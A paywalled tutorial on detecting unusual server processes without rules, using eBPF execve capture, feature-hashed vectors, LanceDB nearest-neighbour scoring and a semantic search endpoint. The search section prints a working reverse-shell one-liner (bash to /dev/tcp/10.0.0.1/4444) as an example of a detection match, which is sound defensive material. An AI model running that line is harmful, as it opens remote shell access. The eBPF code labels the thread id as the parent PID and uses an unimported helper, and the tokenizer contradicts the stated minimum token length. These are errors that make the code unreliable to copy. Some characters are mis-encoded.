Detecting unusual processes on your servers without writing a single rule
Behavioral Process Telemetry: Zero-Configuration Anomaly Detection with eBPF and Embedded Vectors
Current Situation Analysis
Traditional host security relies on a fundamental assumption: you can define what malicious behavior looks like before it happens. Tools like Falco, OSSEC, and Wazuh operationalize this by shipping thousands of signature rules or YAML policies. A typical enterprise deployment ships with roughly 5,000 preconfigured rules. The operational reality is starkly different. These rulesets consistently miss approximately 50% of environment-specific anomalies because they only detect patterns that security researchers have already documented and encoded.
This approach creates three compounding problems:
- Coverage gaps for novel behavior: A developer's ad-hoc debugging script, a forgotten CI/CD artifact, or a newly introduced deployment pattern will never trigger a rule that doesn't exist.
- Maintenance debt: Every new service, framework update, or infrastructure change requires manual rule tuning. False positives accumulate, leading to alert fatigue and eventual rule suppression.
- Scalability friction: At fleet scale, telemetry ingestion becomes expensive. Processing 3,000 process events per hour across a modest 50-node cluster requires either local neural embedding models (adding 200MB+ of weights and 5β20ms CPU latency per event) or external API calls (introducing network dependency and per-request costs).
The industry has largely accepted this trade-off: either maintain an ever-growing ruleset, or pay for heavy ML infrastructure. What's often overlooked is that security doesn't require understanding what "bad" looks like. It only requires understanding what "normal" looks like for a specific workload. Once a behavioral baseline is established, deviation becomes the signal. This shifts the operational model from reactive signature matching to proactive anomaly detection, eliminating manual rule authoring while maintaining deterministic, low-latency scoring.
WOW Moment: Key Findings
The architectural pivot from signature matching to behavioral vectorization fundamentally changes how telemetry scales and what it catches. The following comparison isolates the operational trade-offs across three common approaches:
| Approach | Setup Time | Latency/Event | Infrastructure Cost | Novel Threat Detection | Maintenance Overhead |
|---|---|---|---|---|---|
| Rule-Based (YAML/Signatures) | Days to weeks | <0.1ms | Low | Poor (known patterns only) | High (constant tuning) |
| Neural Embeddings (Local/API) | Hours | 5β20ms (local) / 100ms+ (API) | High (GPU/CPU or API fees) | Good (semantic similarity) | Medium (model versioning) |
| Feature-Hashed Vectors | Minutes | <0.1ms | Near-zero (embedded) | Strong (structural deviation) | Low (auto-baselining) |
Why this matters: Feature-hashed behavioral vectors eliminate the cold-start problem of rule authoring and the infrastructure drag of neural models. By converting process telemetry into fixed-dimensional vectors and measuring cosine distance against a rolling baseline, you achieve deterministic anomaly scoring with zero external dependencies. The system learns environment-specific normalcy automatically, flags structural deviations immediately, and scales linearly with fleet size without API rate limits or model weight management.
Core Solution
The implementation rests on four interconnected layers: kernel telemetry capture, deterministic vectorization, embedded storage with anomaly scoring, and semantic query routing. Each layer is designed for zero-infrastructure deployment and deterministic reproducibility.
Step 1: Kernel Telemetry Capture with eBPF and Fallback
Process execution events originate at the sys_enter_execve tracepoint. This fires before the new program image is loaded, providing a reliable interception point for command-line arguments, parent process context, and execution metadata.
Using the Aya framework in Rust, we attach a tracepoint program that extracts execution metadata and routes it to a userspace ring buffer. The implementation avoids complex BPF map management by leveraging per-CPU ring buffers for high-throughput, low-contention delivery.
// kernel/collector.rs
use aya_bpf::programs::TracePointContext;
use aya_bpf::helpers::bpf_get_current_pid_tgid;
use aya_bpf::helpers::bpf_get_current_comm;
#[repr(C)]
pub struct ExecSnapshot {
pub pid: u32,
pub ppid: u32,
pub uid: u32,
pub comm: [u8; 16],
pub cmdline: [u8; 128],
pub timestamp_ns: u64,
}
#[tracepoint(name = "sys_enter_execve")]
pub fn capture_exec(ctx: TracePointContext) -> Result<u32, i64> {
let pid_tgid = bpf_get_current_pid_tgid();
let pid = (pid_tgid >> 32) as u32;
let ppid = (pid_tgid & 0xFFFFFFFF) as u32;
let mut snap = ExecSnapshot {
pid,
ppid,
uid: 0, // populated via bpf_get_current_uid_gid in production
comm: [0; 16],
cmdline: [0; 128],
timestamp_ns: bpf_ktime_get_ns(),
};
if let Ok(comm_bytes) = bpf_get_current_comm() {
snap.comm = comm_bytes;
}
// Read filename pointer from tracepoint args (simplified for brevity)
// In production, use bpf_probe_read_kernel_str for safe string extraction
emit_snapshot(&snap)?;
Ok(0)
}
The userspace agent consumes the ring buffer, batches events, and transmits them to the backend telemetry pipeline. For environments running kernels older than 5.8 or lacking BTF (BPF Type Format) support, the agent gracefully degrades to polling /proc/[pid]/cmdline and /proc/[pid]/status at fixed intervals. This fallback sacrifices sub-millisecond precision but preserves behavioral telemetry continuity across heterogeneous fleets.
Architectural rationale: eBPF provides deterministic, low-overhead kernel visibility without modifying application binaries or injecting sidecars. The /proc fallback ensures baseline coverage isn't fragmented by kernel version constraints. Batching reduces network round-trips and aligns with backend ingestion patterns.
Step 2: Deterministic Vectorization via Feature Hashing
Raw telemetry strings cannot be compared directly. We convert each execution snapshot into a fixed-length numerical vector using feature hashing (the hashing trick). This approach tokenizes structured fields, maps tokens to vector indices via deterministic hashing, and accumulates signed contributions.
// telemetry/vectorizer.ts
import { createHash } from 'crypto';
const VECTOR_DIM = 128;
const TOKEN_SEPARATOR = '|';
interface TelemetrySnapshot {
processName: string;
parentProcess: string;
uid: number;
localPort?: number;
remotePort?: number;
commandLine: string;
}
function tokenize(input: string): string[] {
return input
.toLowerCase()
.split(/[\s\/\-\.\:]+/)
.filter(t => t.length > 0);
}
function deterministicHash(token: string, salt: number): number {
const h = createHash('sha256')
.update(`${token}:${salt}`)
.digest('hex');
return parseInt(h.slice(0, 8), 16);
}
export function buildBehavioralVector(event: TelemetrySnapshot): Float32Array {
const vec = new Float32Array(VECTOR_DIM);
const fields = [
event.processName,
event.parentProcess,
String(event.uid),
String(event.localPort ?? 0),
String(event.remotePort ?? 0),
...tokenize(event.commandLine)
];
for (let i = 0; i < fields.length; i++) {
const token = fields[i].trim();
if (!token) continue;
const idx = deterministicHash(token, i * 31) % VECTOR_DIM;
const sign = (deterministicHash(token, i * 31 + 1) & 1) ? 1 : -1;
vec[idx] += sign;
}
// L2 normalization for stable cosine distance calculations
let magnitude = 0;
for (let i = 0; i < VECTOR_DIM; i++) {
magnitude += vec[i] ** 2;
}
magnitude = Math.sqrt(magnitude) || 1;
for (let i = 0; i < VECTOR_DIM; i++) {
vec[i] /= magnitude;
}
return vec;
}
Why feature hashing over neural embeddings? Neural models like all-MiniLM-L6-v2 or text-embedding-3-small capture semantic relationships (e.g., sh and bash are both shells). However, they introduce operational friction: local inference requires 200MB+ weights and 5β20ms CPU time per event, while external APIs add network latency, per-token costs, and single points of failure. Feature hashing runs in <0.1ms, requires zero dependencies, and produces identical vectors for identical inputs. For structured telemetry where token overlap strongly correlates with behavioral similarity, hashing delivers sufficient discriminative power without infrastructure overhead. The vectorization layer is isolated behind a single interface, allowing future migration to neural embeddings without touching scoring or storage logic.
Step 3: Embedded Storage and Anomaly Scoring
We use LanceDB, an embedded vector database that operates in-process and persists data to disk. Each workload receives an isolated table. New events are vectorized, compared against the 10 nearest historical neighbors, scored via cosine distance, and appended to the baseline.
// telemetry/scorer.ts
import { cosineSimilarity } from './math-utils';
interface BaselineRow {
vector: Float32Array;
recordedAt: number;
}
export async function evaluateAnomaly(
orgId: string,
workload: string,
event: TelemetrySnapshot
): Promise<{ score: number; isNew: boolean }> {
const table = await getOrCreateWorkloadTable(orgId, workload);
const vec = buildBehavioralVector(event);
// Retrieve k=10 nearest historical executions
const neighbors = await table.search(vec).limit(10).toArray();
let anomalyScore = 1.0; // Maximum deviation by default
if (neighbors.length > 0) {
const distances = neighbors.map(n =>
1 - cosineSimilarity(vec, n.vector)
);
const minDistance = Math.min(...distances);
// Scale to 0-1 range where 0 = identical, 1 = completely novel
anomalyScore = Math.min(1.0, minDistance * 2);
}
// Persist to baseline for future comparisons
await table.add([{
vector: Array.from(vec),
recordedAt: Date.now()
}]);
// Prune entries older than 7 days to prevent baseline stagnation
await table.delete({ recordedAt: { $lt: Date.now() - 7 * 24 * 60 * 60 * 1000 } });
return { score: anomalyScore, isNew: anomalyScore > 0.8 };
}
The anomaly score ranges from 0 (frequently observed behavior) to 1 (structurally novel execution). Scores are persisted to ClickHouse alongside raw telemetry for downstream alerting, dashboarding, and forensic querying. Temporal pruning ensures the baseline adapts to legitimate infrastructure changes without accumulating stale noise.
Step 4: Semantic Query Interface
Once telemetry is vectorized, natural language queries become nearest-neighbor searches. The same feature hashing pipeline converts a search string into a query vector, which is then compared against workload tables.
// api/search.ts
app.post('/security/search', async (req, res) => {
const { query, orgId, workload } = req.body;
const queryVec = buildBehavioralVector({
processName: query,
parentProcess: '',
uid: 0,
commandLine: query
} as TelemetrySnapshot);
const results = await getOrCreateWorkloadTable(orgId, workload)
.search(queryVec)
.limit(20)
.toArray();
res.json({ matches: results.map(r => ({
score: 1 - cosineSimilarity(queryVec, r.vector),
timestamp: r.recordedAt
}))});
});
A query like reverse shell bash outbound connection will match executions containing bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 because the token sets overlap significantly in the hashed vector space. This eliminates keyword matching limitations and surfaces structurally similar behavior regardless of exact phrasing.
Pitfall Guide
1. Ignoring BTF and Kernel Version Requirements
Explanation: eBPF programs compiled without BTF (BPF Type Format) will fail to load on kernels lacking CO-RE (Compile Once, Run Everywhere) support. Attempting to attach to sys_enter_execve on kernels <5.8 without fallback logic causes silent telemetry gaps.
Fix: Always verify CONFIG_DEBUG_INFO_BTF=y and kernel version β₯5.8 before loading eBPF programs. Implement the /proc polling fallback and log the degradation path explicitly.
2. Vector Space Collision from Poor Tokenization
Explanation: Aggressive tokenization or ignoring delimiters causes unrelated commands to hash into identical vector indices. curl http://api.example.com and curl http://api.internal.local may collide if domain boundaries aren't preserved.
Fix: Use structured delimiters (/, ., :, -) that preserve semantic boundaries. Apply minimum token length filters (β₯3 characters) to discard noise like a, 1, or --.
3. Baseline Stagnation Without Temporal Decay
Explanation: Accumulating all historical events indefinitely causes the baseline to become a "fossilized" average. Legitimate infrastructure changes (framework upgrades, new deployment tools) are permanently flagged as anomalies because the old baseline dominates the nearest-neighbor search. Fix: Implement sliding window pruning (e.g., 7-day retention). Weight recent events higher during scoring if your workload undergoes frequent legitimate changes.
4. Cosine Distance Misuse Without Normalization
Explanation: Cosine similarity assumes unit vectors. Feeding unnormalized feature-hashed vectors produces skewed distances where high-magnitude vectors artificially dominate nearest-neighbor results.
Fix: Always apply L2 normalization after feature hashing. Verify normalization in unit tests by asserting Math.sqrt(vec.reduce((s, v) => s + v**2, 0)) β 1.
5. Over-Indexing on Single-Event Scores
Explanation: A single high anomaly score doesn't guarantee malicious intent. A first-run CI/CD script or a developer's ad-hoc diagnostic command will score 0.8β0.95 on initial execution but represent legitimate behavior.
Fix: Implement temporal smoothing. Require consecutive high scores or correlate with execution frequency. Use score decay: effective_score = max(score, previous_score * 0.7) to allow legitimate novelty to normalize.
6. Missing Fallback for Containerized Environments
Explanation: eBPF programs attached at the host level may not capture process execution inside containers with isolated PID namespaces. Relying solely on host-level tracepoints creates blind spots in Kubernetes or Docker environments.
Fix: Deploy the telemetry agent as a DaemonSet with hostPID: true and hostNetwork: true to observe container process execution from the host namespace. Validate coverage by cross-referencing with container runtime metrics.
7. Unbounded Vector Table Growth
Explanation: LanceDB tables grow linearly with event volume. Without pruning or compaction, disk I/O increases, search latency degrades, and memory pressure rises during vector scans. Fix: Enforce strict retention policies. Use LanceDB's built-in compaction for older segments. Monitor table row counts and trigger archival to cold storage (S3/GCS) when thresholds are exceeded.
Production Bundle
Action Checklist
- Verify kernel version β₯5.8 and BTF support before deploying eBPF collector
- Implement
/procfallback with explicit logging for legacy environments - Apply L2 normalization to all feature-hashed vectors before storage
- Configure 7-day sliding window retention for baseline tables
- Set initial anomaly threshold at 0.85 for production, 0.7 for dev
- Cross-validate eBPF coverage against container runtime metrics
- Implement temporal smoothing to prevent first-run false positives
- Archive pruned baseline data to object storage for forensic retention
Decision Matrix
| Scenario | Recommended Approach | Why | Cost Impact |
|---|---|---|---|
| Heterogeneous fleet (kernels 4.18β6.x) | eBPF + /proc fallback |
Ensures 100% coverage without kernel upgrades | Low (agent handles degradation) |
| High-frequency workloads (>10k events/hr) | Feature hashing (128-dim) | Sub-millisecond vectorization, zero API dependency | Near-zero CPU/network |
| Semantic search accuracy critical | Neural embeddings (local) | Captures shell/script semantic similarity | High (GPU/CPU, 200MB+ weights) |
| Multi-tenant SaaS platform | LanceDB per-tenant isolation | Zero infrastructure, fast nearest-neighbor, easy backup | Low (embedded, disk-bound) |
| Compliance/audit requirements | ClickHouse + vector scores | Immutable storage, SQL querying, retention policies | Medium (managed ClickHouse) |
Configuration Template
# telemetry-agent-config.yaml
agent:
mode: auto # auto, ebpf, proc
batch_interval_ms: 60000
max_batch_size: 500
ebpf:
tracepoint: sys_enter_execve
ring_buffer_pages: 64
btf_required: true
vectorization:
dimension: 128
normalization: l2
token_min_length: 3
delimiters: [" ", "/", ".", ":", "-", "="]
storage:
provider: lancedb
retention_days: 7
prune_interval_hours: 24
path: /var/lib/telemetry/baselines
scoring:
k_neighbors: 10
distance_metric: cosine
threshold_warn: 0.85
threshold_critical: 0.95
temporal_smoothing: true
decay_factor: 0.7
backend:
endpoint: https://telemetry.internal/v1/events
auth_header: X-API-Key
retry_max: 3
timeout_ms: 5000
Quick Start Guide
- Deploy the telemetry agent: Install the collector binary on target hosts. The agent auto-detects kernel capabilities and selects eBPF or
/procpolling. - Initialize baseline tables: Run
telemetry-agent init --org prod --workload web-frontendto create the first LanceDB table and ingest initial execution snapshots. - Configure scoring thresholds: Adjust
threshold_warnandthreshold_criticalin the YAML config based on workload sensitivity. Production typically uses 0.85; development uses 0.7. - Validate vector coverage: Execute
telemetry-agent validate --sample-size 100to confirm L2 normalization, tokenization boundaries, and nearest-neighbor retrieval latency (<5ms). - Connect to analytics pipeline: Point the agent's backend endpoint to your ClickHouse cluster or telemetry aggregator. Query
security_eventstable foranomaly_score > 0.8to surface novel executions.
Mid-Year Sale β Unlock Full Article
Base plan from just $4.99/mo or $49/yr
Sign in to read the full article and unlock all tutorials.
Sign In / Register β Start Free Trial7-day free trial Β· Cancel anytime Β· 30-day money-back
